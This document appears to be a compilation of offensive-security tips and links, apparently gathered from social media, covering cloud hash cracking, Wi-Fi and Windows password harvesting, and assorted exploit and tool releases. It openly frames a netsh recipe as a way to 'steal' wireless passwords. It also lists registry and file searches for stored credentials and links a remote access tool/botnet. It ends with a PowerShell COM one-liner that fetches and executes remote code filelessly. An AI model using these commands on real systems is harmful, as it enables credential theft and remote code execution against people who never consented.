How-To: Cloud Cracker

1) Create AWS EC2 Instance
2) Choose p3.16xlarge
3) Install nVidia drivers
4) Install Hashcat
5) Crack Password Hashes

Alt) Choose an upToDate AMI from nVidia in the AWS Marketplace that already has nvidia drivers & configs installed. Then install Hashcat.

GitHub - 0xInfection/Awesome-WAF: 🔥 A curated list of awesome web-app firewall (WAF) stuff.
https://github.com/0xInfection/Awesome-WAF

Need to steal the password to a wireless network? Have access to Windows 8 or 10 box?

1) netsh wlan show profiles
2) netsh wlan show profile name=WIFI_NAME key=clear
3) Look for the “Key Content” line, the cleartext password will be there.

Wireshark 3.0.0 Released! https://t.co/B9lA0GdpzC

Wordpress Scanners collection:-
https://t.co/q3s23QBKp2
https://t.co/8cPeIHZJ3i
https://t.co/7e0Bi62JWN
https://t.co/MPgMWMiWkI
https://t.co/DoYZuEuT6M
https://t.co/GaZAmoguiH

Day 59: Windows API for Pentesting (Part 1) – int0x33 – Medium
https://medium.com/@int0x33/day-59-windows-api-for-pentesting-part-1-178c6ba280cb

Analyzing a Windows DHCP Server Bug (CVE-2019-0626) - MalwareTech
https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html

Arbitrary File Reading in Next.js < 2.4.1 – Arseny Reutov – Medium
https://raz0r.name/vulnerabilities/arbitrary-file-reading-in-next-js-2-4-1/

Released a very special v2.18 - "Jackass" bettercap

https://t.co/I89btKAe4y

File upload vulnerability scanner and exploitation tool.
https://t.co/JoQu6EQz6Y

Credentials & lateral movement

findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki

Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html

Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767

MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5

Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net

Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3

Apktool v2.4.0 Released
https://connortumbleson.com/2019/03/03/apktool-v2-4-0-released/

Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.

Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane

Powershell + COM fileless download exec alternative:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;

You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.

And set the proxy using setProxy() method.